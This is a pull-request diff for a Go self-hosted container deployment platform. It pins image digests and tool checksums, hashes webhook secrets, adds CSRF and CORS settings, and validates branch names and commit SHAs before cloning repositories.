Merge pull request 'tidy' (#148) from fix/tidy into main

Reviewed-on: #148

.gitea/workflows/check.yml

@@ -0,0 +1,16 @@
+name: Check
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+
+jobs:
+  check:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4, 2024-10-13
+
+      - name: Build (runs make check inside Dockerfile)
+        run: docker build .

Dockerfile

@@ -1,11 +1,24 @@
 # Build stage
-FROM golang:1.25-alpine AS builder
+# golang:1.25-alpine
+FROM golang@sha256:f6751d823c26342f9506c03797d2527668d095b0a15f1862cddb4d927a7a4ced AS builder
 
 RUN apk add --no-cache git make gcc musl-dev
 
-# Install golangci-lint v2
+# Install golangci-lint v2 (pre-built binary — go install fails in alpine due to missing linker)
-RUN go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@latest
+RUN set -e; \
-RUN go install golang.org/x/tools/cmd/goimports@latest
+    GOLANGCI_VERSION="2.10.1"; \
+    case "$(uname -m)" in \
+        x86_64)  ARCH="amd64"; SHA256="dfa775874cf0561b404a02a8f4481fc69b28091da95aa697259820d429b09c99" ;; \
+        aarch64) ARCH="arm64"; SHA256="6652b42ae02915eb2f9cb2a2e0cac99514c8eded8388d88ae3e06e1a52c00de8" ;; \
+        *) echo "unsupported arch: $(uname -m)" >&2; exit 1 ;; \
+    esac; \
+    wget -q -O /tmp/golangci-lint.tar.gz \
+        "https://github.com/golangci/golangci-lint/releases/download/v${GOLANGCI_VERSION}/golangci-lint-${GOLANGCI_VERSION}-linux-${ARCH}.tar.gz"; \
+    echo "${SHA256}  /tmp/golangci-lint.tar.gz" | sha256sum -c -; \
+    tar -xzf /tmp/golangci-lint.tar.gz -C /usr/local/bin --strip-components=1 "golangci-lint-${GOLANGCI_VERSION}-linux-${ARCH}/golangci-lint"; \
+    rm /tmp/golangci-lint.tar.gz; \
+    golangci-lint version
+RUN go install golang.org/x/tools/cmd/goimports@009367f5c17a8d4c45a961a3a509277190a9a6f0 # v0.42.0
 
 WORKDIR /src
 COPY go.mod go.sum ./
@@ -20,7 +33,8 @@ RUN make check
 RUN make build
 
 # Runtime stage
-FROM alpine:3.19
+# alpine:3.19
+FROM alpine@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1
 
 RUN apk add --no-cache ca-certificates tzdata git openssh-client docker-cli
 

README.md

@@ -157,8 +157,8 @@ Environment variables:
 | Variable | Description | Default |
 |----------|-------------|---------|
 | `PORT` | HTTP listen port | 8080 |
-| `UPAAS_DATA_DIR` | Data directory for SQLite and keys | ./data |
+| `UPAAS_DATA_DIR` | Data directory for SQLite and keys | `./data` (local dev only — use absolute path for Docker) |
-| `UPAAS_HOST_DATA_DIR` | Host path for DATA_DIR (when running in container) | same as DATA_DIR |
+| `UPAAS_HOST_DATA_DIR` | Host path for DATA_DIR (when running in container) | *(none — must be set to an absolute path)* |
 | `UPAAS_DOCKER_HOST` | Docker socket path | unix:///var/run/docker.sock |
 | `DEBUG` | Enable debug logging | false |
 | `SENTRY_DSN` | Sentry error reporting DSN | "" |
@@ -176,8 +176,35 @@ docker run -d \
   upaas
 ```
 
-**Important**: When running µPaaS inside a container, set `UPAAS_HOST_DATA_DIR` to the host path
+### Docker Compose
-that maps to `UPAAS_DATA_DIR`. This is required for Docker bind mounts during builds to work correctly.
+
+```yaml
+services:
+  upaas:
+    build: .
+    restart: unless-stopped
+    ports:
+      - "8080:8080"
+    volumes:
+      - /var/run/docker.sock:/var/run/docker.sock
+      - ${HOST_DATA_DIR}:/var/lib/upaas
+    environment:
+      - UPAAS_HOST_DATA_DIR=${HOST_DATA_DIR}
+      # Optional: uncomment to enable debug logging
+      # - DEBUG=true
+      # Optional: Sentry error reporting
+      # - SENTRY_DSN=https://...
+      # Optional: Prometheus metrics auth
+      # - METRICS_USERNAME=prometheus
+      # - METRICS_PASSWORD=secret
+```
+
+**Important**: You **must** set `HOST_DATA_DIR` to an **absolute path** on the host before running
+`docker compose up`. This value is bind-mounted into the container and passed as `UPAAS_HOST_DATA_DIR`
+so that Docker bind mounts during builds resolve correctly. Relative paths (e.g. `./data`) will break
+container builds because the Docker daemon resolves paths relative to the host, not the container.
+
+Example: `HOST_DATA_DIR=/srv/upaas/data docker compose up -d`
 
 Session secrets are automatically generated on first startup and persisted to `$UPAAS_DATA_DIR/session.key`.
 

TODO.md

@@ -1,312 +0,0 @@
-# UPAAS Implementation Plan
-
-## Feature Roadmap
-
-### Core Infrastructure
-- [x] Uber fx dependency injection
-- [x] Chi router integration
-- [x] Structured logging (slog) with TTY detection
-- [x] Configuration via Viper (env vars, config files)
-- [x] SQLite database with embedded migrations
-- [x] Embedded templates (html/template)
-- [x] Embedded static assets (Tailwind CSS, JS)
-- [x] Server startup (`Server.Run()`)
-- [x] Graceful shutdown (`Server.Shutdown()`)
-- [x] Route wiring (`SetupRoutes()`)
-
-### Authentication & Authorization
-- [x] Single admin user model
-- [x] Argon2id password hashing
-- [x] Initial setup flow (create admin on first run)
-- [x] Cookie-based session management (gorilla/sessions)
-- [x] Session middleware for protected routes
-- [x] Login/logout handlers
-- [ ] API token authentication (for JSON API)
-
-### App Management
-- [x] Create apps with name, repo URL, branch, Dockerfile path
-- [x] Edit app configuration
-- [x] Delete apps (cascades to related entities)
-- [x] List all apps on dashboard
-- [x] View app details
-- [x] Per-app SSH keypair generation (Ed25519)
-- [x] Per-app webhook secret (UUID)
-
-### Container Configuration
-- [x] Environment variables (add, delete per app)
-- [x] Docker labels (add, delete per app)
-- [x] Volume mounts (add, delete per app, with read-only option)
-- [x] Docker network configuration per app
-- [ ] Edit existing environment variables
-- [ ] Edit existing labels
-- [ ] Edit existing volume mounts
-- [ ] CPU/memory resource limits
-
-### Deployment Pipeline
-- [x] Manual deploy trigger from UI
-- [x] Repository cloning via Docker git container
-- [x] SSH key authentication for private repos
-- [x] Docker image building with configurable Dockerfile
-- [x] Container creation with env vars, labels, volumes
-- [x] Old container removal before new deployment
-- [x] Deployment status tracking (building, deploying, success, failed)
-- [x] Deployment logs storage
-- [x] View deployment history per app
-- [x] Container logs viewing
-- [ ] Deployment rollback to previous image
-- [ ] Deployment cancellation
-
-### Manual Container Controls
-- [x] Restart container
-- [x] Stop container
-- [x] Start stopped container
-
-### Webhook Integration
-- [x] Gitea webhook endpoint (`/webhook/:secret`)
-- [x] Push event parsing
-- [x] Branch extraction from refs
-- [x] Branch matching (only deploy configured branch)
-- [x] Webhook event audit log
-- [x] Automatic deployment on matching webhook
-- [ ] Webhook event history UI
-- [ ] GitHub webhook support
-- [ ] GitLab webhook support
-
-### Health Monitoring
-- [x] Health check endpoint (`/health`)
-- [x] Application uptime tracking
-- [x] Docker container health status checking
-- [x] Post-deployment health verification (60s delay)
-- [ ] Custom health check commands per app
-
-### Notifications
-- [x] ntfy integration (HTTP POST)
-- [x] Slack-compatible webhook integration
-- [x] Build start/success/failure notifications
-- [x] Deploy success/failure notifications
-- [x] Priority mapping for notification urgency
-
-### Observability
-- [x] Request logging middleware
-- [x] Request ID generation
-- [x] Sentry error reporting (optional)
-- [x] Prometheus metrics endpoint (optional, with basic auth)
-- [ ] Structured logging for all operations
-- [ ] Deployment count/duration metrics
-- [ ] Container health status metrics
-- [ ] Webhook event metrics
-- [ ] Audit log table for user actions
-
-### API
-- [ ] JSON API (`/api/v1/*`)
-- [ ] List apps endpoint
-- [ ] Get app details endpoint
-- [ ] Create app endpoint
-- [ ] Delete app endpoint
-- [ ] Trigger deploy endpoint
-- [ ] List deployments endpoint
-- [ ] API documentation
-
-### UI Features
-- [x] Server-rendered HTML templates
-- [x] Dashboard with app list
-- [x] App creation form
-- [x] App detail view with all configurations
-- [x] App edit form
-- [x] Deployment history page
-- [x] Login page
-- [x] Setup page
-- [ ] Container logs page
-- [ ] Webhook event history page
-- [ ] Settings page (webhook secret, SSH public key)
-- [ ] Real-time deployment log streaming (WebSocket/SSE)
-
-### Future Considerations
-- [ ] Multi-user support with roles
-- [ ] Private Docker registry authentication
-- [ ] Scheduled deployments
-- [ ] Backup/restore of app configurations
-
----
-
-## Phase 1: Critical (Application Cannot Start)
-
-### 1.1 Server Startup Infrastructure
-- [x] Implement `Server.Run()` in `internal/server/server.go`
-  - Start HTTP server with configured address/port
-  - Handle TLS if configured
-  - Block until shutdown signal received
-- [x] Implement `Server.Shutdown()` in `internal/server/server.go`
-  - Graceful shutdown with context timeout
-  - Close database connections
-  - Stop running containers gracefully (optional)
-- [x] Implement `SetupRoutes()` in `internal/server/routes.go`
-  - Wire up chi router with all handlers
-  - Apply middleware (logging, auth, CORS, metrics)
-  - Define public vs protected route groups
-  - Serve static assets and templates
-
-### 1.2 Route Configuration
-```
-Public Routes:
-  GET  /health
-  GET  /setup, POST /setup
-  GET  /login, POST /login
-  POST /webhook/:secret
-
-Protected Routes (require auth):
-  GET  /logout
-  GET  /dashboard
-  GET  /apps/new, POST /apps
-  GET  /apps/:id, POST /apps/:id, DELETE /apps/:id
-  GET  /apps/:id/edit, POST /apps/:id/edit
-  GET  /apps/:id/deployments
-  GET  /apps/:id/logs
-  POST /apps/:id/env-vars, DELETE /apps/:id/env-vars/:id
-  POST /apps/:id/labels, DELETE /apps/:id/labels/:id
-  POST /apps/:id/volumes, DELETE /apps/:id/volumes/:id
-  POST /apps/:id/deploy
-```
-
-## Phase 2: High Priority (Core Functionality Gaps)
-
-### 2.1 Container Logs
-- [x] Implement `HandleAppLogs()` in `internal/handlers/app.go`
-  - Fetch logs via Docker API (`ContainerLogs`)
-  - Support tail parameter (last N lines)
-  - Stream logs with SSE or chunked response
-- [x] Add Docker client method `GetContainerLogs(containerID, tail int) (io.Reader, error)`
-
-### 2.2 Manual Container Controls
-- [x] Add `POST /apps/:id/restart` endpoint
-  - Stop and start container
-  - Record restart in deployment log
-- [x] Add `POST /apps/:id/stop` endpoint
-  - Stop container without deleting
-  - Update app status
-- [x] Add `POST /apps/:id/start` endpoint
-  - Start stopped container
-  - Run health check
-
-## Phase 3: Medium Priority (UX Improvements)
-
-### 3.1 Edit Operations for Related Entities
-- [ ] Add `PUT /apps/:id/env-vars/:id` endpoint
-  - Update existing environment variable value
-  - Trigger container restart with new env
-- [ ] Add `PUT /apps/:id/labels/:id` endpoint
-  - Update existing Docker label
-- [ ] Add `PUT /apps/:id/volumes/:id` endpoint
-  - Update volume mount paths
-  - Validate paths before saving
-
-### 3.2 Deployment Rollback
-- [ ] Add `previous_image_id` column to apps table
-  - Store last successful image ID before new deploy
-- [ ] Add `POST /apps/:id/rollback` endpoint
-  - Stop current container
-  - Start container with previous image
-  - Create deployment record for rollback
-- [ ] Update deploy service to save previous image before building new one
-
-### 3.3 Deployment Cancellation
-- [ ] Add cancellation context to deploy service
-- [ ] Add `POST /apps/:id/deployments/:id/cancel` endpoint
-- [ ] Handle cleanup of partial builds/containers
-
-## Phase 4: Lower Priority (Nice to Have)
-
-### 4.1 JSON API
-- [ ] Add `/api/v1` route group with JSON responses
-- [ ] Implement API endpoints mirroring web routes:
-  - `GET /api/v1/apps` - list apps
-  - `POST /api/v1/apps` - create app
-  - `GET /api/v1/apps/:id` - get app details
-  - `DELETE /api/v1/apps/:id` - delete app
-  - `POST /api/v1/apps/:id/deploy` - trigger deploy
-  - `GET /api/v1/apps/:id/deployments` - list deployments
-- [ ] Add API token authentication (separate from session auth)
-- [ ] Document API in README
-
-### 4.2 Resource Limits
-- [ ] Add `cpu_limit` and `memory_limit` columns to apps table
-- [ ] Add fields to app edit form
-- [ ] Pass limits to Docker container create
-
-### 4.3 UI Improvements
-- [ ] Add webhook event history page
-  - Show received webhooks per app
-  - Display match/no-match status
-- [ ] Add settings page
-  - View/regenerate webhook secret
-  - View SSH public key
-- [ ] Add real-time deployment log streaming
-  - WebSocket or SSE for live build output
-
-### 4.4 Observability
-- [ ] Add structured logging for all operations
-- [ ] Add Prometheus metrics for:
-  - Deployment count/duration
-  - Container health status
-  - Webhook events received
-- [ ] Add audit log table for user actions
-
-## Phase 5: Future Considerations
-
-- [ ] Multi-user support with roles
-- [ ] Private Docker registry authentication
-- [ ] Custom health check commands per app
-- [ ] Scheduled deployments
-- [ ] Backup/restore of app configurations
-- [ ] GitHub/GitLab webhook support (in addition to Gitea)
-
----
-
-## Implementation Notes
-
-### Server.Run() Example
-```go
-func (s *Server) Run() error {
-    s.SetupRoutes()
-
-    srv := &http.Server{
-        Addr:    s.config.ListenAddr,
-        Handler: s.router,
-    }
-
-    go func() {
-        <-s.shutdownCh
-        ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
-        defer cancel()
-        srv.Shutdown(ctx)
-    }()
-
-    return srv.ListenAndServe()
-}
-```
-
-### SetupRoutes() Structure
-```go
-func (s *Server) SetupRoutes() {
-    r := chi.NewRouter()
-
-    // Global middleware
-    r.Use(s.middleware.RequestID)
-    r.Use(s.middleware.Logger)
-    r.Use(s.middleware.Recoverer)
-
-    // Public routes
-    r.Get("/health", s.handlers.HandleHealthCheck())
-    r.Get("/login", s.handlers.HandleLoginPage())
-    // ...
-
-    // Protected routes
-    r.Group(func(r chi.Router) {
-        r.Use(s.middleware.SessionAuth)
-        r.Get("/dashboard", s.handlers.HandleDashboard())
-        // ...
-    })
-
-    s.router = r
-}
-```

docker-compose.yml

@@ -1,20 +0,0 @@
-services:
-  upaas:
-    build: .
-    restart: unless-stopped
-    ports:
-      - "8080:8080"
-    volumes:
-      - /var/run/docker.sock:/var/run/docker.sock
-      - upaas-data:/var/lib/upaas
-    # environment:
-      # Optional: uncomment to enable debug logging
-      # - DEBUG=true
-      # Optional: Sentry error reporting
-      # - SENTRY_DSN=https://...
-      # Optional: Prometheus metrics auth
-      # - METRICS_USERNAME=prometheus
-      # - METRICS_PASSWORD=secret
-
-volumes:
-  upaas-data:

go.mod

@@ -5,9 +5,11 @@ go 1.25
 require (
 	github.com/99designs/basicauth-go v0.0.0-20230316000542-bf6f9cbbf0f8
 	github.com/docker/docker v27.3.1+incompatible
+	github.com/docker/go-connections v0.6.0
 	github.com/go-chi/chi/v5 v5.2.3
 	github.com/go-chi/cors v1.2.2
 	github.com/google/uuid v1.6.0
+	github.com/gorilla/csrf v1.7.3
 	github.com/gorilla/sessions v1.4.0
 	github.com/joho/godotenv v1.5.1
 	github.com/mattn/go-sqlite3 v1.14.32
@@ -17,6 +19,7 @@ require (
 	github.com/stretchr/testify v1.11.1
 	go.uber.org/fx v1.24.0
 	golang.org/x/crypto v0.46.0
+	golang.org/x/time v0.12.0
 )
 
 require (
@@ -27,7 +30,6 @@ require (
 	github.com/containerd/log v0.1.0 // indirect
 	github.com/davecgh/go-spew v1.1.1 // indirect
 	github.com/distribution/reference v0.6.0 // indirect
-	github.com/docker/go-connections v0.6.0 // indirect
 	github.com/docker/go-units v0.5.0 // indirect
 	github.com/felixge/httpsnoop v1.0.4 // indirect
 	github.com/fsnotify/fsnotify v1.9.0 // indirect
@@ -73,7 +75,6 @@ require (
 	go.yaml.in/yaml/v3 v3.0.4 // indirect
 	golang.org/x/sys v0.39.0 // indirect
 	golang.org/x/text v0.32.0 // indirect
-	golang.org/x/time v0.12.0 // indirect
 	google.golang.org/protobuf v1.36.10 // indirect
 	gopkg.in/yaml.v3 v3.0.1 // indirect
 	gotest.tools/v3 v3.5.2 // indirect

go.sum

@@ -50,6 +50,8 @@ github.com/google/gofuzz v1.2.0 h1:xRy4A+RhZaiKjJ1bPfwQ8sedCA+YS2YcCHW6ec7JMi0=
 github.com/google/gofuzz v1.2.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
 github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
 github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
+github.com/gorilla/csrf v1.7.3 h1:BHWt6FTLZAb2HtWT5KDBf6qgpZzvtbp9QWDRKZMXJC0=
+github.com/gorilla/csrf v1.7.3/go.mod h1:F1Fj3KG23WYHE6gozCmBAezKookxbIvUJT+121wTuLk=
 github.com/gorilla/securecookie v1.1.2 h1:YCIWL56dvtr73r6715mJs5ZvhtnY73hBvEF8kXD8ePA=
 github.com/gorilla/securecookie v1.1.2/go.mod h1:NfCASbcHqRSY+3a8tlWJwsQap2VX5pwzwo4h3eOamfo=
 github.com/gorilla/sessions v1.4.0 h1:kpIYOp/oi6MG/p5PgxApU8srsSw9tuFbt46Lt7auzqQ=

internal/config/config.go

@@ -51,7 +51,8 @@ type Config struct {
 	MaintenanceMode bool
 	MetricsUsername string
 	MetricsPassword string
-	SessionSecret   string
+	SessionSecret   string `json:"-"`
+	CORSOrigins     string
 	params          *Params
 	log             *slog.Logger
 }
@@ -102,6 +103,7 @@ func setupViper(name string) {
 	viper.SetDefault("METRICS_USERNAME", "")
 	viper.SetDefault("METRICS_PASSWORD", "")
 	viper.SetDefault("SESSION_SECRET", "")
+	viper.SetDefault("CORS_ORIGINS", "")
 }
 
 func buildConfig(log *slog.Logger, params *Params) (*Config, error) {
@@ -136,6 +138,7 @@ func buildConfig(log *slog.Logger, params *Params) (*Config, error) {
 		MetricsUsername: viper.GetString("METRICS_USERNAME"),
 		MetricsPassword: viper.GetString("METRICS_PASSWORD"),
 		SessionSecret:   viper.GetString("SESSION_SECRET"),
+		CORSOrigins:     viper.GetString("CORS_ORIGINS"),
 		params:          params,
 		log:             log,
 	}

internal/database/database.go

@@ -3,7 +3,9 @@ package database
 
 import (
 	"context"
+	"crypto/sha256"
 	"database/sql"
+	"encoding/hex"
 	"fmt"
 	"log/slog"
 	"os"
@@ -158,6 +160,65 @@ func (d *Database) connect(ctx context.Context) error {
 		return fmt.Errorf("failed to run migrations: %w", err)
 	}
 
+	// Backfill webhook_secret_hash for any rows that have a secret but no hash
+	err = d.backfillWebhookSecretHashes(ctx)
+	if err != nil {
+		return fmt.Errorf("failed to backfill webhook secret hashes: %w", err)
+	}
+
+	return nil
+}
+
+// HashWebhookSecret returns the hex-encoded SHA-256 hash of a webhook secret.
+func HashWebhookSecret(secret string) string {
+	sum := sha256.Sum256([]byte(secret))
+
+	return hex.EncodeToString(sum[:])
+}
+
+func (d *Database) backfillWebhookSecretHashes(ctx context.Context) error {
+	rows, err := d.database.QueryContext(ctx,
+		"SELECT id, webhook_secret FROM apps WHERE webhook_secret_hash = '' AND webhook_secret != ''")
+	if err != nil {
+		return fmt.Errorf("querying apps for backfill: %w", err)
+	}
+
+	defer func() { _ = rows.Close() }()
+
+	type row struct {
+		id, secret string
+	}
+
+	var toUpdate []row
+
+	for rows.Next() {
+		var r row
+
+		scanErr := rows.Scan(&r.id, &r.secret)
+		if scanErr != nil {
+			return fmt.Errorf("scanning app for backfill: %w", scanErr)
+		}
+
+		toUpdate = append(toUpdate, r)
+	}
+
+	rowsErr := rows.Err()
+	if rowsErr != nil {
+		return fmt.Errorf("iterating apps for backfill: %w", rowsErr)
+	}
+
+	for _, r := range toUpdate {
+		hash := HashWebhookSecret(r.secret)
+
+		_, updateErr := d.database.ExecContext(ctx,
+			"UPDATE apps SET webhook_secret_hash = ? WHERE id = ?", hash, r.id)
+		if updateErr != nil {
+			return fmt.Errorf("updating webhook_secret_hash for app %s: %w", r.id, updateErr)
+		}
+
+		d.log.Info("backfilled webhook_secret_hash", "app_id", r.id)
+	}
+
 	return nil
 }
 

internal/database/hash_test.go

@@ -0,0 +1,28 @@
+package database_test
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+
+	"git.eeqj.de/sneak/upaas/internal/database"
+)
+
+func TestHashWebhookSecret(t *testing.T) {
+	t.Parallel()
+
+	// Known SHA-256 of "test-secret"
+	hash := database.HashWebhookSecret("test-secret")
+	assert.Equal(t,
+		"9caf06bb4436cdbfa20af9121a626bc1093c4f54b31c0fa937957856135345b6",
+		hash,
+	)
+
+	// Different secrets produce different hashes
+	hash2 := database.HashWebhookSecret("other-secret")
+	assert.NotEqual(t, hash, hash2)
+
+	// Same secret always produces same hash (deterministic)
+	hash3 := database.HashWebhookSecret("test-secret")
+	assert.Equal(t, hash, hash3)
+}

internal/database/migrations.go

@@ -113,9 +113,9 @@ func (d *Database) applyMigration(ctx context.Context, filename string) error {
 		return fmt.Errorf("failed to record migration: %w", err)
 	}
 
-	commitErr := transaction.Commit()
+	err = transaction.Commit()
-	if commitErr != nil {
+	if err != nil {
-		return fmt.Errorf("failed to commit migration: %w", commitErr)
+		return fmt.Errorf("failed to commit migration: %w", err)
 	}
 
 	return nil

internal/database/migrations/005_add_webhook_secret_hash.sql

@@ -0,0 +1,2 @@
+-- Add webhook_secret_hash column for constant-time secret lookup
+ALTER TABLE apps ADD COLUMN webhook_secret_hash TEXT NOT NULL DEFAULT '';

internal/database/migrations/006_add_previous_image_id.sql

@@ -0,0 +1,2 @@
+-- Add previous_image_id to apps for deployment rollback support
+ALTER TABLE apps ADD COLUMN previous_image_id TEXT;

internal/database/testing.go

@@ -0,0 +1,41 @@
+package database
+
+import (
+	"log/slog"
+	"os"
+	"testing"
+
+	"git.eeqj.de/sneak/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/logger"
+)
+
+// NewTestDatabase creates an in-memory Database for testing.
+// It runs migrations so all tables are available.
+func NewTestDatabase(t *testing.T) *Database {
+	t.Helper()
+
+	tmpDir := t.TempDir()
+
+	cfg := &config.Config{
+		DataDir: tmpDir,
+	}
+
+	log := slog.New(slog.NewTextHandler(os.Stderr, nil))
+	logWrapper := logger.NewForTest(log)
+
+	db, err := New(nil, Params{
+		Logger: logWrapper,
+		Config: cfg,
+	})
+	if err != nil {
+		t.Fatalf("failed to create test database: %v", err)
+	}
+
+	t.Cleanup(func() {
+		if db.database != nil {
+			_ = db.database.Close()
+		}
+	})
+
+	return db
+}

internal/docker/client.go

@@ -10,12 +10,14 @@ import (
 	"log/slog"
 	"os"
 	"path/filepath"
+	"regexp"
 	"strconv"
 	"strings"
 
-	"github.com/docker/docker/api/types"
+	dockertypes "github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/image"
 	"github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/client"
@@ -24,6 +26,7 @@ import (
 	"go.uber.org/fx"
 
 	"git.eeqj.de/sneak/upaas/internal/config"
+
 	"git.eeqj.de/sneak/upaas/internal/logger"
 )
 
@@ -46,6 +49,18 @@ var ErrNotConnected = errors.New("docker client not connected")
 // ErrGitCloneFailed is returned when git clone fails.
 var ErrGitCloneFailed = errors.New("git clone failed")
 
+// ErrInvalidBranch is returned when a branch name contains invalid characters.
+var ErrInvalidBranch = errors.New("invalid branch name")
+
+// ErrInvalidCommitSHA is returned when a commit SHA is not a valid hex string.
+var ErrInvalidCommitSHA = errors.New("invalid commit SHA")
+
+// validBranchRe matches safe git branch names.
+var validBranchRe = regexp.MustCompile(`^[a-zA-Z0-9._/\-]+$`)
+
+// validCommitSHARe matches a full-length hex commit SHA.
+var validCommitSHARe = regexp.MustCompile(`^[0-9a-f]{40}$`)
+
 // Params contains dependencies for Client.
 type Params struct {
 	fx.In
@@ -102,7 +117,7 @@ type BuildImageOptions struct {
 func (c *Client) BuildImage(
 	ctx context.Context,
 	opts BuildImageOptions,
-) (string, error) {
+) (ImageID, error) {
 	if c.docker == nil {
 		return "", ErrNotConnected
 	}
@@ -174,7 +189,7 @@ func buildPortConfig(ports []PortMapping) (nat.PortSet, nat.PortMap) {
 func (c *Client) CreateContainer(
 	ctx context.Context,
 	opts CreateContainerOptions,
-) (string, error) {
+) (ContainerID, error) {
 	if c.docker == nil {
 		return "", ErrNotConnected
 	}
@@ -227,18 +242,18 @@ func (c *Client) CreateContainer(
 		return "", fmt.Errorf("failed to create container: %w", err)
 	}
 
-	return resp.ID, nil
+	return ContainerID(resp.ID), nil
 }
 
 // StartContainer starts a container.
-func (c *Client) StartContainer(ctx context.Context, containerID string) error {
+func (c *Client) StartContainer(ctx context.Context, containerID ContainerID) error {
 	if c.docker == nil {
 		return ErrNotConnected
 	}
 
 	c.log.Info("starting container", "id", containerID)
 
-	err := c.docker.ContainerStart(ctx, containerID, container.StartOptions{})
+	err := c.docker.ContainerStart(ctx, containerID.String(), container.StartOptions{})
 	if err != nil {
 		return fmt.Errorf("failed to start container: %w", err)
 	}
@@ -247,7 +262,7 @@ func (c *Client) StartContainer(ctx context.Context, containerID string) error {
 }
 
 // StopContainer stops a container.
-func (c *Client) StopContainer(ctx context.Context, containerID string) error {
+func (c *Client) StopContainer(ctx context.Context, containerID ContainerID) error {
 	if c.docker == nil {
 		return ErrNotConnected
 	}
@@ -256,7 +271,7 @@ func (c *Client) StopContainer(ctx context.Context, containerID string) error {
 
 	timeout := stopTimeoutSeconds
 
-	err := c.docker.ContainerStop(ctx, containerID, container.StopOptions{Timeout: &timeout})
+	err := c.docker.ContainerStop(ctx, containerID.String(), container.StopOptions{Timeout: &timeout})
 	if err != nil {
 		return fmt.Errorf("failed to stop container: %w", err)
 	}
@@ -267,7 +282,7 @@ func (c *Client) StopContainer(ctx context.Context, containerID string) error {
 // RemoveContainer removes a container.
 func (c *Client) RemoveContainer(
 	ctx context.Context,
-	containerID string,
+	containerID ContainerID,
 	force bool,
 ) error {
 	if c.docker == nil {
@@ -276,7 +291,7 @@ func (c *Client) RemoveContainer(
 
 	c.log.Info("removing container", "id", containerID, "force", force)
 
-	err := c.docker.ContainerRemove(ctx, containerID, container.RemoveOptions{Force: force})
+	err := c.docker.ContainerRemove(ctx, containerID.String(), container.RemoveOptions{Force: force})
 	if err != nil {
 		return fmt.Errorf("failed to remove container: %w", err)
 	}
@@ -287,7 +302,7 @@ func (c *Client) RemoveContainer(
 // ContainerLogs returns the logs for a container.
 func (c *Client) ContainerLogs(
 	ctx context.Context,
-	containerID string,
+	containerID ContainerID,
 	tail string,
 ) (string, error) {
 	if c.docker == nil {
@@ -300,7 +315,7 @@ func (c *Client) ContainerLogs(
 		Tail:       tail,
 	}
 
-	reader, err := c.docker.ContainerLogs(ctx, containerID, opts)
+	reader, err := c.docker.ContainerLogs(ctx, containerID.String(), opts)
 	if err != nil {
 		return "", fmt.Errorf("failed to get container logs: %w", err)
 	}
@@ -323,13 +338,13 @@ func (c *Client) ContainerLogs(
 // IsContainerRunning checks if a container is running.
 func (c *Client) IsContainerRunning(
 	ctx context.Context,
-	containerID string,
+	containerID ContainerID,
 ) (bool, error) {
 	if c.docker == nil {
 		return false, ErrNotConnected
 	}
 
-	inspect, err := c.docker.ContainerInspect(ctx, containerID)
+	inspect, err := c.docker.ContainerInspect(ctx, containerID.String())
 	if err != nil {
 		return false, fmt.Errorf("failed to inspect container: %w", err)
 	}
@@ -340,13 +355,13 @@ func (c *Client) IsContainerRunning(
 // IsContainerHealthy checks if a container is healthy.
 func (c *Client) IsContainerHealthy(
 	ctx context.Context,
-	containerID string,
+	containerID ContainerID,
 ) (bool, error) {
 	if c.docker == nil {
 		return false, ErrNotConnected
 	}
 
-	inspect, err := c.docker.ContainerInspect(ctx, containerID)
+	inspect, err := c.docker.ContainerInspect(ctx, containerID.String())
 	if err != nil {
 		return false, fmt.Errorf("failed to inspect container: %w", err)
 	}
@@ -364,7 +379,7 @@ const LabelUpaasID = "upaas.id"
 
 // ContainerInfo contains basic information about a container.
 type ContainerInfo struct {
-	ID      string
+	ID      ContainerID
 	Running bool
 }
 
@@ -399,7 +414,7 @@ func (c *Client) FindContainerByAppID(
 	ctr := containers[0]
 
 	return &ContainerInfo{
-		ID:      ctr.ID,
+		ID:      ContainerID(ctr.ID),
 		Running: ctr.State == "running",
 	}, nil
 }
@@ -430,6 +445,15 @@ func (c *Client) CloneRepo(
 	ctx context.Context,
 	repoURL, branch, commitSHA, sshPrivateKey, containerDir, hostDir string,
 ) (*CloneResult, error) {
+	// Validate inputs to prevent shell injection
+	if !validBranchRe.MatchString(branch) {
+		return nil, fmt.Errorf("%w: %q", ErrInvalidBranch, branch)
+	}
+
+	if commitSHA != "" && !validCommitSHARe.MatchString(commitSHA) {
+		return nil, fmt.Errorf("%w: %q", ErrInvalidCommitSHA, commitSHA)
+	}
+
 	if c.docker == nil {
 		return nil, ErrNotConnected
 	}
@@ -457,10 +481,24 @@ func (c *Client) CloneRepo(
 	return c.performClone(ctx, cfg)
 }
 
+// RemoveImage removes a Docker image by ID or tag.
+// It returns nil if the image was successfully removed or does not exist.
+func (c *Client) RemoveImage(ctx context.Context, imageID ImageID) error {
+	_, err := c.docker.ImageRemove(ctx, imageID.String(), image.RemoveOptions{
+		Force:         true,
+		PruneChildren: true,
+	})
+	if err != nil && !client.IsErrNotFound(err) {
+		return fmt.Errorf("failed to remove image %s: %w", imageID, err)
+	}
+
+	return nil
+}
+
 func (c *Client) performBuild(
 	ctx context.Context,
 	opts BuildImageOptions,
-) (string, error) {
+) (ImageID, error) {
 	// Create tar archive of build context
 	tarArchive, err := archive.TarWithOptions(opts.ContextDir, &archive.TarOptions{})
 	if err != nil {
@@ -475,7 +513,7 @@ func (c *Client) performBuild(
 	}()
 
 	// Build image
-	resp, err := c.docker.ImageBuild(ctx, tarArchive, types.ImageBuildOptions{
+	resp, err := c.docker.ImageBuild(ctx, tarArchive, dockertypes.ImageBuildOptions{
 		Dockerfile: opts.DockerfilePath,
 		Tags:       opts.Tags,
 		Remove:     true,
@@ -505,7 +543,7 @@ func (c *Client) performBuild(
 			return "", fmt.Errorf("failed to inspect image: %w", inspectErr)
 		}
 
-		return inspect.ID, nil
+		return ImageID(inspect.ID), nil
 	}
 
